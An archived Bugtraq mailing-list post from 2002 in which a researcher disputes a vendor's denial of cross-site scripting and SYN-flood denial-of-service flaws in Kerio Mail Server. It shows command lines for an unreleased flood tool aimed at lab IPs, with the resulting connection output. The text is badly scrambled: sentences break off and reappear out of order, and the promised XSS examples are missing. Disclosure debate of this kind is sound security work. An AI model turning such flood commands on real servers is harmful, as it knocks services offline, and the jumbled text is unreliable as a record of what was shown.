Re: Kerio Mail Server Multiple Security vulnerabilities
From: Abraham Lincoln (sunninja@scientist.com)Date: 08/29/02
- Previous message: @stake Advisories: "Microsoft Terminal Server Client Buffer Overrun (A082802-1)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Abraham Lincoln" <sunninja@scientist.com> To: bugtraq@securityfocus.com Date: Thu, 29 Aug 2002 08:35:56 +0800
Hi.
This is a straight forward answer to what Mr. Jaroslav Snajdr of
Kerio.com mail server dev is claiming that kerio mail server is not
vulnerable. To clear things up and let the people judge.
by the way Mr. Snajdr im recieving emails that they confirmed
that the vulnerability in ur product DO EXIST. anyway i'll proceed to
the explanation in reproducing the vulnerability.
We will show u if this advisory is real or Not Bec. We Wil be
Releasing Another SECURITY ADVISORY against newest version of Kerio
Mail Server.
1] Cross-Site Scripting Vulnerability with Kerio
"secure" Web Mail module.
Try this:
Even Page 404 is vulnerable? funny. Mr. Kevin of spidy thanks ;)
Other is not yet to be devulge it will be released on the next
2] DOS Vulnerability with Every Kerio Mail Server Services.
Some people think (*shrrug*) that Securing the TCP/IP stack
Test Bed: [*nix with synflood)<----------->[Winnt with sp6A
synmail = our synflood Proof of Concept Code
[root@NSSIlabs]# ./synmail
[root@NSSIlabs]# ./synmail 192.168.0.1 25 40
[root@NSSIlabs]# nc 192.168.0.1 25
Vulnerable or No? ;)
Another Testing Against Other mail server: (against sendmail) ;)
[root@NSSIlabs]# ./synmail
[root@NSSIlabs]# ./synmail 192.168.0.2 25 50
Note: as u would notice we increase syn packets to 50. ;)
Its for you to judge if this is wrong or right. People who's
Hey Mr. Snajdr if u think that this demo is not acceptable or so..
Thanks and good day! ;)
http://keriowebmail/
Another Sample:
http://keriowebmail/passwd
funny ;)
SO Kerio is not vulnerable with Cross-site scripting? ;P now u g0t
idea how to recode ur InSecure coding style. Want to know more about
Crossite-scripting? REad the FAQ always and search it in google. ;p
advisory this Week ;)
of the Operating system could Protect their Application against DOS.
Let people judge:
/Win2k Sp3 with Kerio Mailserver] (note: all win servers are hardened
;)
Kerio Mail Server IP = 192.168.0.1
Sendmail IP = 192.168.0.2
./synmail <destinationIP> <Port> <num of packets>
Targeting host 192.168.0.1 .......
done!
[root@NSSIlabs]# telnet 192.168.0.1 25
Trying 192.168.0.1...
telnet: Unable to connect to remote host: Connection refused
note: no reply from netcat ;) meaning port is closed after
targeting port 25 with 40 syn packets
./synmail <destinationIP> <Port> <num of packets>
Targeting host 192.168.0.2 .......
done!
[root@SunNinja remote]# telnet 192.168.0.2 25
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
220 nssilabs.nssolution.COM ESMTP Sendmail 8.9.3/8.9.3; Wed, 28 Aug
2002 03:14:3
7 +0800
reading this may test it on their own ;)
We will be releasing another Security Advisory regarding Newest
version of Kerio Mail Server ;)
there's nothing we can do about it. We just found a flaw in your
application and we inform you about it before releasing the advisory
for u to release patch but unfortunately We recieve emails from you
that this vulnerability report is fake. anyway people who's reading
this will be the one to judge ;)
Regards,
Abraham
NSSI Research Labs
"When They say that their Technology is Un-Breakable they are
Lying..." - Bruce
--
__________________________________________________________
Sign-up for your own FREE Personalized E-mail at Mail.com
http://www.mail.com/?sr=signup
Relevant Pages
... Package: FTGate4 Groupware Mail server ... Vulnerability Type: Remote Code Execution ... FTGate4 is a powerful Windowscommunication suite that combines ...
(Bugtraq)
... > the internal net or somebody is using an external smtp server from ... the mail server is an open relay. ... There is a relatively new vulnerability for exchange hosts (2000, ...
(alt.computer.security)
... I have been running a 220R, as a mail server for about ... Seems more than adequate under normal conditions. ... DOS attack. ... suggestions to reduce this type of vulnerability? ...
(SunManagers)
... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... By "pretending" to be an iPAQ and connecting to TCP port 5679, ... sending a corrupted "I would like to sync with you" packet, ... Sample code to demonstrate the vulnerability is shown below: ...
(Securiteam)
... (Microsoft SQL Server sp_replwritetovarbin limited memory overwrite ... This vulnerability has been described in a prior security ... Our public security advisory has been updated accordingly: ... Remove the sp_replwriterovarbin extended stored procedure. ...
(Full-Disclosure)
